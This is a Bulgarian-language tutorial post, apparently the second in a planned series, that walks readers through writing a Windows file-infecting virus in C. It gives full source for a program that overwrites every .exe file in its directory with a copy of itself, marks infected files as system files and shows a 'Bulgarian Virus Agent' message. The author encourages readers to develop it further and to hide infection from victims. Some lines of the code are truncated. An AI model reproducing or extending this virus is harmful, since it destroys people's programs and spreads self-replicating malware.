Реших да почна да пиша поредица от такива статий и след това може да ги обединя в книга. Точно тази статия която поствам е втората от поредицата но нея ще постна преди първата :lol: Да знам че е малко тъпо но стана така защото като я завърших разбрах че не съм обяснил някой по главни неща за по начинаещите и затова ще има първа статия в която да обясня някой по прости неща.
Иначе тази я поствам за да ми кажете какво мислите и да ми напишите вашите забележки и препоръки за да може да го дооправя :ugeek: Скоро и статия номер 1 ще бъде готова. Някой ако иска да помога (има знания) е винаги добре дошъл
За да четете тази статия трябва да знаете за някой главни неща в програмирането (pointers,arrays,
structures, etc..) и да сте на ти с C\C++ синтаксиса Също и някой минимални познания
за Уондоус средата за програмиране
Специално за тази статия съм направил прост вирус който презаписва всички .exe файлове
в директрията където се изпълнява с свои копия и извежда съобщение при пускането му .
С следващите статий ще видим как ще уложним и развием или изцяло променим този вирус
до създаването на нещо яко :D
Реших да го направя на C защото тва е един от удобните за програмиране езици който се
знае от най много хора
В този вирус както и в всички останали за Windows ни е нужна само една библиотека.
И то тази на Уиндоуса .
[code]#include
мисля че няма нужда от обяснение :P
Нека започнем с обяснение на съществените функций (Ако сега са ви неясни
то по късно като разгледаме кода на вируса мисля че ще ви станат ясно )
Дадената функция увеличава размера на жертвата до толкова че да може да бъде презаписана
от вируса защото ако вируса е 10000 байта а жертвата 500 то няма как вируса да я презапише
тъй като неговия размер е по голям (може вируса да се направи по прост и тази функция както
и много други да не бъдат нужни но аз искам да обясня неща които ще са нужни и за други
вируси )
FixSize взима два аргумента BytesToAdd (броят на байтовете които трябва
да бъдат добавени за да се изравни размера на жертвата и вируса) и FileHandle (Повод към
жертвата създаден чрез CreateFile(), с който можем да четем и пишем жертвата).
SetFilePointer премества пойнтера чрез който можем да четем и пишем файла в неговият край
(иначе е в началото).
А със WriteFile записваме низ със дължина равна на разликата между размера на вируса
и на жертвата(ще видите после) в края на жертвата.
[code]
int FixSize(int BytesToAdd,HANDLE FileHandle) {
DWORD BytesWritten = 0;
char Buffer[BytesToAdd];
SetFilePointer(FileHandle,0,0,FILE_END);
WriteFile(FileHandle,Buffer,BytesToAdd,&BytesWritten,NULL);
return 0;
}
[/code]
Следващата функция Infect също е много проста Както самото име казва тази функция
инфектира жертвата със вируса(в нашият случей презаписва жертвата с копие на вируса).
Функцията взима 3 аргумента FileHandle(пойнтер сочещ към началото на жертвата
заредена в памета с MapViewOfFile()) VirusHandle(пойнтер сочещ към началото на вируса
зареден в памета с MapViewOfFile())
VirusSize(размера на вируса).
For(;;) цикъла във тази функция просто презаписва един по един байтовете на жертвата от
началото с тези на вируса докато броят на презаписаните байтове не достигне размера на вируса.
Ако например размера на жертвата е 1000 а размера на вируса 500 то само първите 500 байта
ше бъдат презаписани а останалите ще останат, но при пускане на вече инфектиряният файл
то останалите 500 байта няма да бъдат заредени в памета ще бъдат заредени само първите 500,
а останалите ще съществуват само когато разглеждаме жертвата на харда а не в памета
(ще разберете защо е така по нататък ).
[code]
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize) {
int i;
for(i = 0;i
FileHandle++;
VirusHandle++;
}
return 0;
}
[/code]
Сега следва една по сложна функция OpenFileToInfect
Тази функция взима 3 аргумента FileName(името на жертвата), OpenHandle(това е пойнтер който
при извикването на функцията очаква да му дадете адреса където искате да запише адреса
на който ще бъде заредена жертвата в памета, това става като пред името на променливата
в която искате да запишете този адреса сложите &, ще видите по късно ) и VirusSize(размера на вируса).
[code]
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize) {
int Size;
*OpenHandle = CreateFile(FileName,GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);
if(VirusSize > Size) { FixSize((VirusSize-Size),*OpenHandle); }
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_EXECUTE_READWRITE,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_ALL_ACCESS,0,0,0);
return Size;
}
[/code]
С първата линия отваряме файла а със втората взимаме неговият размер
[code]*OpenHandle = CreateFile(FileName,GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);[/code]
Тази линия е много съществена защото тук проверяваме дали вируса е по голям от жертвата
и ако е то тогава извикваме функцията FixSize() за да изравни размерите... като параметри
даваме разликата между размера на вируса и размера на жертвата и повод към отвореният файл
[code]if(VirusSize > Size) { FixSize((VirusSize-Size),*OpenHandle); }[/code]
С първата линия CreateFileMapping зарежда файла в памета на системата за да може
да се използва от много процеси чрез повода върнат от функцията, но не го зарежда
в процеса на вируса, затова за да го заредим в процеса на вируса трябва да използваме
MapViewFile.И сега вече върнатият повод е към началото на файла . ЗАБЕЛЕЖЕТЕ!: Зареден
по този начин в памета файла е зареден точно така както изглежда на харда а не така както
изглежда когато се изпълнява .
[code]
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_EXECUTE_READWRITE,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_ALL_ACCESS,0,0,0);
[/code]
OpenVirus функцията е по прост вариант на OpenFileToInfect такаче не е нужно обяснение
тук Единственото което трябва да отбележим е че ако погледните някой от аргументите
на Уиндоус функцийте ще забележите че в този случай вируса се отваря само за четене
защото в момента той се изпълнява и неможем да пишем върху него
Нека сега разгледаме главният контролен код на вируса
Първо взимаме пътя към вируса и неговото име които ще бъдат записани под формата на низ
във FilePath , това ни е нужно защото трябва да извикаме OpenVirus функцията да отвори вируса
за четене а уиндоус функцийте вътре изискват пътя или само името не файла
Ето тук при извикване на OpenVirus виждате как даваме адреса на променливата в която
искаме да запишем крайният адрес на който ще бъде зареден вируса &VirusHandle (ако се прочели
всичко по горе ще ви е ясно тва )
Както виждате тази функция връща размера на вируса който ще ни е нужен по късно
[code] GetModuleFileName(NULL,FilePath,MAX_PATH);
VirusSize = OpenVirus(FilePath,&VirusHandle);[/code]
Сега тука тва може да ви се стори малко сложно на пръв поглед :P
Тук ще разгледаме системата на вируса за намиране на файлове
При търсенето на файлове трябва първо да извикаме функцията FindFirstFile за да намерим
първият файл и след това вече за да намерим и другите файлове извикваме FindNextFile
При изпълнението на FindFirstFile то функцията връща повод който ще се използва при всяко
следващо изпълнение на FindNextFil за намиране на друг файл вместо име или маска за файлове
И двете функций ползват една и съща структура за записване на данни за намереният файл
такаче при всяко намиране на файл информацията в структурата се променя
ЗАБЕЛЕЖЕТЕ!: Реда на намиране на файловете винаги е азбучен
Можеби някой от вас се чудят какво е FileMask... Това е просто низ в който сме задали маска
с която ще намерим всички файлове с разширение EXE
FindData също може да ви изглежда като нещо страно но това е просто структура от типа
WIN32_FIND_DATA в която при намиране на всеки файл се записва полезна информация за файла,
като например дата на създаване,дата на модифициране, атрибути и такива
След като вече сме намерили първият файл следва линия от код който в момента е ненужен
но после когато започнем да търсим за още ще проверява кога повода върнат от FindNextFile
е равен на 0 (няма повече файлове). Забележете при декларирането на повода NextHandle = 1
му даваме стойност 1 защото иначе ще му бъде дадена някаква произволна стойноста която
в някой случей може да е равна на 0 и още при първата проверка дали NextHandle е равно на
нула резултата да бъде положителен и вируса да не инфектира повече файлове (нека не оставяме
нищо на случайноста :P )
[code]if(NextHandle == 0) { goto Finish; }[/code]
И ако условието е вярно то тогава утиваме там кадето е дефинирано заглавието Finish:
Където ще бъде изпълнен така нареченият PayLoad (това е някакав код който обикновено
показва някакво съобщение на потребителя който стартира заразеняит файл )
В нашият случай PayLoad-a се състои от прост MessageBox който ще изведе съобщение
че файла е инфектиран от еди кой си вирус Но вие може да създадете някакъв по сложен и як
PayLoad за да стреснете потребителя :P А може и да не слагате PayLoad ако искате
никой да не разбира че някой файл е заразен от ваш вирус
[code]MessageBox(0,Payload,Title,MB_ICONERROR); [/code]
Следващата линия също е код за проверка при който проверяваме дали атрибутите на намериният
файл са FILE_ATTRIBUTE_SYSTEM (константа дефинирана в Уиндоус библиотеката) или по просто
системни. Защо ли ? Защото ако по погледнете малко по нататък
в кода ще видите че точно след като файла е инфектиран вируса му дава системни атрибути за да
може да различава инфектираните от не инфектираните файлове :P (този метод се ползва от много
вируси )
Както преди разаяснихме FindData е структура от типа WIN32_FIND_DATA, а dwFileAttributes
е член на тази структура в който се пазят атрибутите на намериният файл
[code]if(FindData.dwFileAttributes == FILE_ATTRIBUTE_SYSTEM)[/code]
И ако условието е вярно то тогава намереният файл е вече заразен и се налага
да изпълним FindNextFile за да потърсим за друг файл след което следва проверка
дали файловете в директорията не са свършели както обяснихме по горе ( това
в нашият случей става с GOTO който ни праща обратно на заглавието FindFiles: ) и отново
проверка дали файла не е заразен вече ако не е заразен продължаваме нататък
[code] NextHandle = FindNextFile(FileFindHandle,&FindData);
goto FindFiles; [/code]
Сега първата стъпка преди да заразим файла е да го отворим и заредим в памета
В нашият случей това вируса прави като извика функцията OpenFileToInfect Която връща
размера на файла и адреса на който е зареден файла в променливата FileOpenHandle което
мисля че вече обясних как става (като дадем адреса на променливата като стойност
на пойнтер в дадената функция ;) мноо як трик ) Тази функция съм я обяснил по горе
такаче няма да губя повече време върху нея
[code]FileSize = OpenFileToInfect(FindData.cFileName,&FileOpenHandle,VirusSize);[/code]
Следва функцията за заразяване на файла Infect даваме й три параметра FileOpenHandle (адреса
на който е зареден файла за инфектиране) ,VirusHandle (Адреса на който е зареден вируса),
VirusSize (размера на вируса). Няма да обяснявам тази функция тъй като съм я обяснил вече
по горе .
[code]Infect(FileOpenHandle,VirusHandle,VirusSize); [/code]
Сега след като вече файла е инфектиран следва уиндоус функция която ще го запише
обратно на харда FlushViewOfFile. Тя не е сложа и взима само два параметра
FileOpenHandle (Адресът на който е зареден вече инфектираният файл) и VirusSize (размера на вируса
, който казва колко байта на адреса указан в FileOpenHandle да бъдат записани на харда )
[code]FlushViewOfFile(FileOpenHandle,VirusSize); [/code]
И ето вече файла е инфектиран и записан на диска сега само остава да променим неговите
атрибути на системни за да предотвратим повторн инфектиране :P (знаете за какво става въпрос
ако сте прочели всико по горе :P ). Това става с функцията SetFileAttributes която взима
само два параметра, името на файла ( което отново взимаме от FindData структурата, FindData.cFileName)
и какви атрибути да дадем на този файл, FILE_ATTRIBUTE_SYSTEM разбирасе (ако файла е имал
атрибути като например Archive+Normal то те ще бъдат презаписани със тези дадени
в този аргумент)
[code]SetFileAttributes(FindData.cFileName,FILE_ATTRIBUTE_SYSTEM); [/code]
И ето файла е вече заразен и пълно копие на този функциониращ вирус готов да търси
своите жертви
Този код отново връща вируса да търси за нови жертви докато файловете
в директорията не свършват и тогава да изведе PayLoad-a
[code]goto FindFiles;[/code]
А ето и целият код 8-) :
[code]
#include
int FixSize(int BytesToAdd, HANDLE FileHandle);
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize);
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize);
int OpenVirus(char FileName[] , HANDLE *OpenHandle);
int main()
{
char FileMask[] = "*.exe",FilePath[MAX_PATH],Payload[]="File Destroyed By Bulgarian Virus Agent!",Title[] = "Bulgarian Virus Agent";
HANDLE FileFindHandle,NextHandle = 1,FileOpenHandle,VirusHandle;
WIN32_FIND_DATA FindData;
int FileSize,VirusSize;
GetModuleFileName(NULL,FilePath,MAX_PATH);
VirusSize = OpenVirus(FilePath,&VirusHandle);
FileFindHandle = FindFirstFile(FileMask,&FindData);
FindFiles:
if(NextHandle == 0) { goto Finish; }
if(FindData.dwFileAttributes == FILE_ATTRIBUTE_SYSTEM) {
FindNextFile:
NextHandle = FindNextFile(FileFindHandle,&FindData);
goto FindFiles;
}
FileSize = OpenFileToInfect(FindData.cFileName,&FileOpenHandle,VirusSize);
Infect(FileOpenHandle,VirusHandle,VirusSize);
FlushViewOfFile(FileOpenHandle,VirusSize);
SetFileAttributes(FindData.cFileName,FILE_ATTRIBUTE_SYSTEM);
goto FindNextFile;
Finish:
MessageBox(0,Payload,Title,MB_ICONERROR);
return 0;
}
int OpenFileToInfect(char FileName[] , HANDLE *OpenHandle, int VirusSize) {
int Size;
*OpenHandle = CreateFile(FileName,GENERIC_ALL,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);
if(VirusSize > Size) { FixSize((VirusSize-Size),*OpenHandle); }
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_EXECUTE_READWRITE,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_ALL_ACCESS,0,0,0);
return Size;
}
int OpenVirus(char FileName[] , HANDLE *OpenHandle) {
int Size;
*OpenHandle = CreateFile(FileName,GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL );
Size = GetFileSize(*OpenHandle,NULL);
*OpenHandle = CreateFileMapping(*OpenHandle,NULL,PAGE_READONLY,0,0,NULL);
*OpenHandle = MapViewOfFile(*OpenHandle,FILE_MAP_READ,0,0,0);
return Size;
}
int Infect(unsigned char *FileHandle,unsigned char *VirusHandle,int VirusSize) {
int i;
for(i = 0;i
FileHandle++;
VirusHandle++;
}
return 0;
}
int FixSize(int BytesToAdd,HANDLE FileHandle) {
DWORD BytesWritten = 0;
char Buffer[BytesToAdd];
SetFilePointer(FileHandle,0,0,FILE_END);
WriteFile(FileHandle,Buffer,BytesToAdd,&BytesWritten,NULL);
return 0;
}
[/code]
Няма коментари:
Публикуване на коментар